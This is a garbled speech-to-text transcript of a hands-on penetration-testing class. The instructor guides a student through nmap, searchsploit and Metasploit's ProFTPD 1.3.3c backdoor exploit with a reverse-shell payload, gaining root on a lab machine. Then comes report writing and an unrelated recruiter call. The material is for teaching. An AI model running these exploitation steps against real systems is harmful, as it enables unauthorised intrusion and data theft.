inside of your report right you're showing them like look should i be on your default web page
-->
for your server and they're going to buy this oh no no that's no bueno right
-->
what you can do now is you can check this for vulnerabilities
-->
but to fast track you through this particular pen test report we did the in map scan because bad
-->
guys don't have to physically do the tom cruise and the mission impossible and come in physically
-->
and go into your space they'll just try to hack into a server somewhere yeah web application
-->
pentest right there's just one version of pentesting there's so many different mobile all
-->
that stuff now you see that you're there's a default web page in the server what do you need
-->
now in a perfect where if there's some way you can find a username and a password you could probably
-->
get into that server and there's a clue since there's an ftp a file transfer um protocol there's
-->
probably a file over there i need to get it and then ssh if i can secure shell into it i could get
-->
all its secrets are you understanding yes so the game plan is all right team i went to port 80
-->
i see that there's a ubuntu server there we have ftp we got ssh ssh is stronger
-->
let's see if we can ftp into that ip and let's see what comes up so now on your terminal
-->
the bottom you're going to type ftp space the ip address 10.0.3.16
-->
and whoa connected pro tp whoa pro ftp and that was up there in the nmap scan too
-->
so you know what you should do on the right terminal we're going to type the word search
-->
exploit one word yes all one word space type in capital p pro ftpd capital p you're going to write
-->
write that word pro ftp d d d oh t pd space 1.3.3 c low kc let's oh press enter oh snap
-->
what did i just do what did you just do there are some there are some vulnerabilities there
-->
there. And NMAP told you that there are vulnerabilities there. There is a compromised
-->
backdoor store. You also did that FTP on the left. Now, that means that you would have to go
-->
to Geeks for Geeks to find examples of FTP. But where it says student, type the word anonymous on
-->
the left real quick a-n-n-o-n-y-m-o-u-s press enter it says anonymous login okay send your
-->
complete email address as your password just press enter on the left login failed 530 login incorrect
-->
guess what every time you get a failure every time you get an in map with some stuff you should
-->
be searching it. It just goes with the territory. You can't act like, oh, I know what that is.
-->
Well, this is just a game. You literally do everything and document it. But it says FTP
-->
on the left. Well, hmm. Type in, who am I on the left? Invalid. Okay. Well, what else can we do?
-->
type in ls please log in with user and pass can't find bind or think you're already in use
-->
okay well we're getting close there's something there type in ls space dash al
-->
press enter please log in with user and pass okay type exit we've already expended our
-->
press the up arrow press enter type anonymous spell it right a n-o-n
-->
y-m-o-u-s press enter press enter type in um ls space tag al enter
-->
okay we're gonna have to figure that out that's okay though hold on one
-->
Segundo. Let's go here.
-->
Basic.
-->
All right, then.
-->
The SV gives you some good stuff, too.
-->
SV. What are you looking at?
-->
I'm looking at my notes.
-->
So now, that's the cool thing about this thing.
-->
Anonymous sometimes works.
-->
That is something for you to look up later.
-->
And I'll try to be here with you so we can look it up,
-->
because there's a reason for it.
-->
If it's telling you this area right here and you don't have the actual username and password, you won't be able to get the information, and that's fine.
-->
But the Pro FTPD shows you, when you did the search exploit, that there is a compromised source backdoor.
-->
Linux remote is a .txt file, and then there's the backdoor command execution where you can use Metasploit.
-->
So may I ask a question?
-->
Yes.
-->
We're on Cali, and so you just did a search exploit.
-->
So I don't have to, like, pull up the individual tool of Metasploit.
-->
I can just combine them on Cali with the proper command.
-->
Oh, that was – so you're going to have to use the individual tool for Metasploit,
-->
but what you want to do is search for vulnerabilities.
-->
You can search for vulnerabilities at the CVE website.
-->
You can search it on Google.
-->
the bottom line is you don't know you didn't know what pro ftpd was don't care what you use
-->
to research it once it shows you that there is a potential backdoor into that specific system
-->
now you have a choice you can do that whole remote code execution or you can use metasploit
-->
what you're going to do now is type msf console on the right press enter this is how you enter
-->
metasploit you're exploiting you decided to exploit the backdoor command execution what
-->
you would do is you will google search how to do that and google will give you steps on how to do
-->
that. Does that make sense? Yes. Okay. So for right now, what I'm going to do is I'm going to
-->
give you some steps just so that we can get it and then we'll reverse engineer it at the end.
-->
Now that you're in Metasploit, I want you to type search space pro FTPD, like it was typed,
-->
capital P. Yeah. R O. It's on the left side. See it written? I know. I got to find it. Okay.
-->
F-T-P-G.
-->
That's an R there, just so you know.
-->
T-T-P-G.
-->
Don't forget the capital.
-->
Space 1.3.3C.
-->
I'll say yes.
-->
Press enter.
-->
Oh, wow.
-->
Look at that right there.
-->
Look at the feedback.
-->
It's letting you know that it has a ranking of excellence.
-->
That should give you some confidence that you can actually pen test and create a backdoor into this system.
-->
Not that hard.
-->
Exactly.
-->
So now there is the use number is actually zero.
-->
See, it says number, name, disclosure, date, rank.
-->
The number is zero.
-->
So what you need to type is use, U-S-E, space, zero.
-->
Enter.
-->
Uh-oh.
-->
It's taking you into the back door.
-->
Now you want to type the word options.
-->
Make sure you spell it right.
-->
Okay.
-->
What's that say?
-->
It gives you a lot of heat.
-->
The C host, the proxies, those are a no.
-->
They're required.
-->
They're not required.
-->
There are hosts, and there are ports for port 21 are required.
-->
Okay.
-->
those are the remote hosts okay so now this is what we're going to do from here
-->
you're going to set the our host so that's what it's telling you to do type
-->
in sct space our host and what is your IP address for the remote host now no s on
-->
our host you want me to put the IP address with the IP address of the
-->
remote post. There you go. You got it. Press enter. It's set. Fantastic. Now you want to type the word
-->
show payload. Okay. Show payloads with an S. Put a space after the word show.
-->
Wow. Look at all these different ways you can actually create a backdoor into this machine.
-->
Isn't this exciting?
-->
Yes.
-->
OK.
-->
So we are looking at the numbers again and the names.
-->
We have to find something that's going to match,
-->
something that's going to work for this particular machine.
-->
So let me see here.
-->
Double, purl, this.
-->
The command Unix reverse should work, which is number four.
-->
so we want to set payload type in set space payload space four space four space four
-->
press enter okay that's the command unix linux reverse shell all right and it should come up
-->
that then we want to type the word options press enter oh snap we got a whole lot going on
-->
we got c host we have the r host is 10.0.3.16 that's what we want the target port is port 21
-->
the l host is required on port 444 so what we want to do now is we want to set the l host
-->
i need to look up lhost what is an lhost the uh local local host your machine for listening okay
-->
yeah so set got it type in set oh set okay space lhost now you got to remember space
-->
your ip address for the um the cali linux machine so this is what you're going to do
-->
On the left side, on the left terminal, right click.
-->
Split the terminal top and bottom.
-->
Type in IP space A.
-->
Press enter.
-->
What's your IP address?
-->
10.0.1.
-->
Type that in as your L host.
-->
Wrong time.
-->
Hello.
-->
Right.
-->
That's your listening machine.
-->
Press enter.
-->
Okay.
-->
Now, how are you feeling?
-->
okay let's run it type are you in press enter all right it's starting to
-->
listener sending backdoor commands saying that cool okay now okay we got
-->
these accepted it B is in okay let's see here session open one session is
-->
open it's created okay type in who am i oh you are root in the end of the day once you get root
-->
access that means you have admin access right that means you can do anything that you want to do
-->
okay now type um id enter verify you have root access as the user the uid
-->
root access in the group okay so now type in um change directory cd space slash root forward slash
-->
root press enter type ls type ls space tag al wow you got some heat in there right
-->
this is what you would do once you get into the machine guess what the goal was for basic
-->
pen testing the goal is to get in to the system and you're in and you've done it you tracking
-->
through a tv yes you just hacked into a machine and got root access if a bad guy can get root
-->
access into any machine life is not grand if there was data on that machine it would show up
-->
like that when you type the you go on the slash root and you type list and um now there's good
-->
data there the bash uh the dot bash rc the dot cache all that's the profile you would have to
-->
research all of that to see what they mean right when a person gets inside of a machine
-->
they want to find, get root access, and they want to find any and all data that they can.
-->
Usernames, passwords, all that. Now what you need to do is screenshot all of this process,
-->
and then I'm going to give you something. Go to Firefox right there.
-->
so screenshot what do how do i do that i'll show you in a minute go to firefox
-->
firefox um there we go open up a new open up a new tab yep and i want you to type in metasploit
-->
space tutorial press enter wow getting started with metasploit
-->
meta's play unleash free online ethical hacking course uh step-by-step guide
-->
click on the step-by-step guide let's see what that is that's the box i like that guy
-->
scroll down a little bit allow selection something use unnecessary cookies only whichever one gets
-->
rid of that cookie thing click on you click at the bottom it says use necessary cookies only
-->
on the far right just click the box use necessary cookies only on the right click
-->
that there you go now scroll to the top swipe it down scroll up to the top something
-->
a touchscreen straight out to the table of contents scroll down to the table of
-->
contents scroll down oh you went far down okay so here's how it is since the
-->
scroll bar is messing with you. This is just one of many resources that will show you how to use
-->
Metasploit. How many things can you do in Metasploit? Too many. Are we going to get it in two
-->
days probably not metasploit establishes a guaranteed tcp handshake and you can do the
-->
absolute most inside of someone else's machine by just following these steps that you actually did it
-->
and now you need to reverse engineer by reading the instructions go ahead and click the back
-->
button at the top left yes took it again okay click on the first one getting
-->
started metasploit for pen test okay rapid seven yes um everything you need
-->
is online there are even better or more maybe user-friendly metasploit tutorials
-->
where you literally go step by step by step by step by step by step you need to
-->
create that in your OneNote
-->
for yourself.
-->
So that when or if
-->
you ever have to do this
-->
by yourself, you know
-->
exactly what to do. You know what L hosts mean.
-->
You know what R hosts mean. You know how to set the
-->
options. You know how to run it. You know how to set the
-->
payloads. So now...
-->
Can we do a sample? Yes, we're going to do it.
-->
A status point? You just did it.
-->
But what we're going to do now is take notes.
-->
Go to
-->
your... Click on the
-->
terminal behind you. Scroll
-->
all the way up to the top on the left fantastic now go to your one note what is the one note i
-->
don't know what one note is we don't use it okay click on the dragon on the top left
-->
oh cali type in one note that's only because i installed it i installed it for you so you can
-->
have it you you click on the dragon again it was just there click on the dragon type one note
-->
see it right there
-->
fantastic
-->
I have to teach you how to take notes
-->
this is actually my OneNote
-->
right
-->
hold on a second
-->
close my OneNote
-->
what kind of computer are you using
-->
HP Envy
-->
but I have it all dismantled
-->
and like you know weirded out
-->
so I can get through the lab
-->
without any pop-ups
-->
so okay well my thing is i want to say um hp um can you go just do you have um a microsoft account
-->
do i have microsoft count and a microsoft account yeah oh i mean let's let's just take a look it's
-->
quick okay okay so go to um your host computer in the search bar and type one though and yes sir
-->
um are you able to share your screen where i can see that window on your host computer see it
-->
you're sharing the desktop window for the desktop can you minimize your screen minimize yeah
-->
minimize that um terminal okay it's not that um minimize your um minimize the desktop i can't
-->
even find that where to minimize it it's not the top right anywhere or bottom yeah i mean can you
-->
see where i'm supposed to minimize this because all i'm trying to do is see your host computer
-->
i know i'm trying to pull it up okay uh go to go to the zoom icon at the bottom
-->
Zoom icon. I'm there.
-->
Okay. Stop sharing.
-->
Stop sharing this one. Stop sharing. Let's just see what's going on.
-->
Let me know what's happening because I don't see anything. I don't see
-->
anything either. And I don't have, I don't
-->
let me just look for it. So it should be at the
-->
bottom. It should say Zoom. It does, but it doesn't pull up.
-->
It's just a Zoom page with nothing on it.
-->
And you don't see the stop share red button, the little hidden icon thing that dropped down before?
-->
No, because, oh, hold it.
-->
Let me get my profile.
-->
There you are.
-->
I see you now.
-->
But so this all got shut down.
-->
Okay.
-->
Do you have another screen by chance in your home?
-->
Yeah.
-->
Okay.
-->
I have a.
-->
yeah because if you can get another screen and hook this up all these problems go away
-->
oh it's gonna no i don't have another microsoft i have apple and it's not gonna go away it's
-->
gonna make it worse gotcha he's done no this is my only computer that i use for this stuff
-->
so do you have a smart television where you can cast stuff to it or even hdmi so no okay
-->
my network is the one i have this on okay meaning the other one is not my own i got you
-->
so let me let me share my screen with you let me just show you what i need you to do
-->
because this is a part of the lesson right uh report writing is something that we must do
-->
do. I'm going to share this thing. Can you see my screen? Yes. Fantastic. All right. So this is
-->
the basic pen testing that we just did. The Metasploit backdoor. I took a screenshot of the
-->
target. What I actually wanted your help with, I intentionally did not do this, is I documented the
-->
ip address i did the pseudo arp scan i got the output i ran my in map scan i did my search exploit
-->
i did my msf console i did my search on here for that i found what i needed right i'm using zero i
-->
have options all right it's showing me all these things right here that i can possibly do
-->
i set the r host i showed the payloads i selected number four that's what i wanted
-->
i did my options it put me right into the exploit unix ftp pro ftp
-->
right i mean i ain't gonna i've done some really advanced pen tests with metasploit
-->
And then I set the L host.
-->
I ran it, right?
-->
I think I had an error there, but I ran the thing.
-->
Who am I?
-->
See whatever.
-->
I run it.
-->
I really didn't have to do anything else because all I wanted to do was get into the machine.
-->
Once I was into the machine, I was good.
-->
The next pen test we want to do is going to become more advanced.
-->
now what i wanted you to do and i was going to help you with it is i want to show you how to
-->
write it like this you will never hurt see all these screenshots with my name on them
-->
because i'm trying to show you that i did it myself i have all my commands this will make
-->
things so much easier for you in the future when you're going to share that with me i'm going to
-->
show you how to do it. It doesn't take long. The only thing is you need to go to the search icon
-->
and type one note and open it. And then you're going to share it with whomever you want to.
-->
So I tell people all the time, I share things, lots of information, but not intellectual problems.
-->
I get it. But also too, is that so you can get that muscle memory.
-->
um by the way i just realized it's 12 18 we haven't taken a break and i apologize
-->
we can take a break anytime you need it but um i do need to take a break at 12 30 because i have
-->
somebody calling me do you um how long would you like to eat lunch 30 minutes an hour what do you
-->
want i i'm whatever you say okay i'm good with i don't need to eat i mean i'm i'll be back whenever
-->
you tell me to come back. Okay. Well, I only need to take a potty break and do a phone call,
-->
grab some lunch, and I can get back here as early as one o'clock if that's okay.
-->
Great. Fantastic. Well, in the meantime, let me get you started with this because I really want
-->
you to do it like this so you can show people it doesn't take long. It's just, I have to show you
-->
have so now i'm going to stop sharing and i want to show you how to get this one note we can do it
-->
in two places i just need to i need to see you i pulled it up but i don't know how to share it
-->
so if you see my image you should be able to share screen you have i see a share there you go
-->
now it's gonna pull share to microsoft outlook 365 i don't know just share the entire screen
-->
share entire notebook no entire screen that's not an option okay um what are the options
-->
the options are share notebook copy notebook email copy of page it's microsoft options it's not
-->
it's not on my zoom page okay well then just share it okay is that what you want uh something's
-->
happening yeah that's what i wanted now you're sharing the entire screen fantastic yes here we
-->
are yes okay here we go you ready type basic pen testing okay now um all right there i want you
-->
to put down my name dr wesley phillips w-e-s-l-e-y okay just put the uh s before the l and take that
-->
s out and wesley it's okay hey there you go now i want you to put down today's date august 1st
-->
2025 and you can put that right underneath my name when you get a chance just did this all
-->
summer my brain like okay i just gotta go back to school august 1st 2025 that i did reports all
-->
summer just fantastic now on the left where it says pen testing but click add page black
-->
add page good voila now you're gonna on underneath friday click there okay we're gonna make some
-->
magic happen okay you're gonna type i'm gonna read it to you we're not gonna make a mistake we're
-->
gonna go great type the word project but make sure you capitalize those because it's gonna be titles
-->
capital p in the word project hit the tab button fantastic type commands
-->
hmm you went to the other page okay that's okay now you're going to type um screenshots the tab
-->
button analysis the tab but one more time and type uh lessons learned like we need a long list
-->
for that box lessons learned press enter okay um you're gonna type objective okay
-->
on the under press the back backspace there you go put the cursor inside lessons learned
-->
underneath it press enter that's how you get a new line now you're going to type
-->
written permission okay we're going to fill in that information later put a right click
-->
in permission got an ion supposed within good put it in the lessons learn box press enter
-->
that's how you get a new line now you're going to type um find the target machine ip find target
-->
machine ip i just do target ip that's fine in the commands you're going to type
-->
sudo net discover sudo space net discover press enter as a matter of fact put the number one in
-->
front of sudo sudo one in front of in front of sudo put number one one period no no let's do it
-->
again one period space sudo put the cursor at the net discover press enter now you got a bullet
-->
two automatically now you're going to type pseudo space arp dash scan don't forget the dash
-->
otherwise you will not find it no no no space arp dash dash no go back go back oh
-->
arp dash no arp dash scan there you go space dash space okay dash l fantastic put the cursing lesson
-->
learn press enter now you want to write verify connectivity now commands number one period
-->
space ping press enter of course you'll ping the ip address you can put that in what yes you type
-->
it 10.0.3.16 i remember it yes enter what was the second command again f ping space 10.3
-->
0.3.16 okay go to lessons learned press enter okay um vulnerability scan on the end just right click
-->
and there you go there you go now press on one period space type in map space 10.0.3.16
-->
press enter, type in map space 10.0.3.16 space TAC capital A, I think what we did first,
-->
press enter type in map 10.0.3.16 space capital a space dash p dash or tack p tack yeah go ahead
-->
and press lessons learned press enter okay okay no no that's good go back to number four again
-->
you're right type in map space 10.3.16 space tack a space tack p
-->
capital a no same thing write the same thing you wrote we're adding space dash p dash
-->
capital a capital a write the same thing you did above that's what you said dash p dash
-->
Dash space, lowercase p, it makes a difference, dash space greater than sign, that's less
-->
than, space, I think we put bpnmapscan.txt, fantastic, go to lessons learned, press enter,
-->
there's so much more we can do, but let's get to where we need to be, we're going to,
-->
where is it? This is here. They move that. And here after we did that, the output of the scan
-->
is what we did next. So that was, oh, go to written permission lessons learned. Press enter.
-->
Oh, that didn't work. Backspace or control Z. Okay. Right. Click right there. Go to table.
-->
insert row below go up insert row below okay so um type find my ip address and you're going to
-->
type number one period space ip space address just so you know everything is always locating
-->
in linux unless it specifies it press enter or you can type ip space addr enter or you can type
-->
ip space a a small case a yeah i'm trying to do i don't have my caps on but it that's okay
-->
capitalizes i'm gonna go back and change all this i'm not worried as soon as you take your call
-->
i'm not even worried they didn't call yet so i'm gonna keep going now i need you to put the cursor
-->
down go press down arrow press backspace until you get back to the a there you go clean now see
-->
how clean that is now go to the lessons learn box no go to underneath vulnerability scan and we want
-->
to type um enumeration a slash exploitation okay now in the commands type one okay he's calling now
-->
So, um, put your screen, put your screenshots inside that, that box.
-->
Okay.
-->
Go to insert.
-->
All right.
-->
I'll be right back.
-->
We'll talk.
-->
All right.
-->
All right.
-->
Speaking.
-->
Pretty good news, Steve Perry.
-->
Yes, sir.
-->
I am busy, but it's a good time.
-->
About the opportunity.
-->
And if it aligns for you and it kind of makes sense,
-->
then we'll get into a little more about yourself and how you might align for
-->
this thing for us.
-->
Does that make sense?
-->
Sure.
-->
So, again, my name's Steve, and I work directly for ATEC.
-->
I'm the Talent Acquisition Director.
-->
And what we do at ATEC is really we're federal contractors with a focus on health IT.
-->
So we support companies.
-->
Are you still here?
-->
And it's really IT-focused.
-->
The opportunity that I'm looking at is an RFP, so I want to be very clear about that up front.
-->
um it's not the work that we want yet uh but we feel like we can position pretty well to it with
-->
our past performance is uh in contract actively teaching a penetration testing class and so
-->
that's and it was scheduled for today and tomorrow from nine to five five oh one i'm yours unless i
-->
can get out of here early which i doubt because uh people paid a lot of money to be in the course
-->
Yeah, I know you call that the craziest day in time. Normally, I'm totally available. But I'm just that I actually am teaching this course today. It's today and tomorrow and I'm available. I mean, I may be able to take a break at like 330 or something like that.
-->
But a lady that, I mean, these people are gung-ho with what I'm showing them.
-->
And it's a hands-on penetration testing course that I'm showing them.
-->
And you should see their faces.
-->
It's kind of like, I don't even know what to tell you.
-->
They are, like, excited.
-->
At least schedule something for you.
-->
All right, schedule that at 3.30.
-->
I'll see if I can get out of here.
-->
I mean, at least get on there.
-->
Yeah, exactly.
-->
Four is good.
-->
I can take a break at four.
-->
If you can
-->
I'm literally trying to send it to you now
-->
Don't go anywhere if you can
-->
I'm just trying to
-->
Where is my gmail
-->
And
-->
Steve Perry
-->
Famous name
-->
There you go, that's right
-->
As I get older, there's less people saying it
-->
That dude
-->
I happen to be a musician
-->
And he just sings his face off
-->
He does
-->
He doesn't that
-->
Definitely one of my favorite singers. So that I think now it's just something
-->
to that email. Now, if you need to redact anything, go ahead and do so.
-->
I want to give you the that's fine. You click on my portfolio, my cybersecurity portfolio,
-->
and you'll probably find it under certifications for this thing. And let me see if I can make four
-->
clockwork all right everybody take take a look at their resume real quick let me know if i have
-->
to change anything moved my eight stock cyber stuff that won't be a conflict anyway there's
-->
something that i mean i teach certification courses as well no i'm in my house teaching
-->
so much has happened in those past 27 minutes
-->
can you share yes i can um so um uh i uh this guy emailed me last night and he pretty much offered
-->
me a job and um i would be the the deputy chief information security officer for a government
-->
agency and um he's like i need to know something today because they want to interview you today and
-->
And I was like, he said, we have to have something in place by Monday again.
-->
I was like, that's fast.
-->
He's like, can you interview today?
-->
I said, man, I'm teaching a class right now.
-->
So I said, no.
-->
Don't let him pressure you.
-->
You just jack up the price.
-->
I did.
-->
Yes.
-->
Way to go, Dr. West.
-->
Thank you.
-->
So we'll see what happens.
-->
But I'm going to work that out.
-->
And I sent him a resume and a whole nine.
-->
And then I got some Chinese food ordered that's going to be delivered to me.
-->
I can't wait to get it.
-->
Oh, good.
-->
Yeah.
-->
But I'm also excited about what we're doing because I can see evidence of your work.
-->
This is repeatable stuff.
-->
Yeah.
-->
I'm better at just being in the lab with no interruptions, without all this nonsense
-->
popping up, without the split screen where I can really just go into it.
-->
Right.
-->
And I'm way better at that.
-->
than writing reports but when i write them they're perfect fantastic that's good i mean and
-->
that's just it so for me as a former sizzle who used to manage pen testers right and actually do
-->
internal teaching to all of the the soccer um you cannot you have to write a report otherwise you're
-->
going to get in trouble and um and so it's uh um let me show you something real quick
-->
oh am i i look like i am sharing i'm not sure share but um i don't see but let me
-->
reduce this okay i see two different desktops now okay so this is my
-->
okay so then that means you're still sharing your screen i guess
-->
yeah you're shut down it looks like yours is um black it just says dot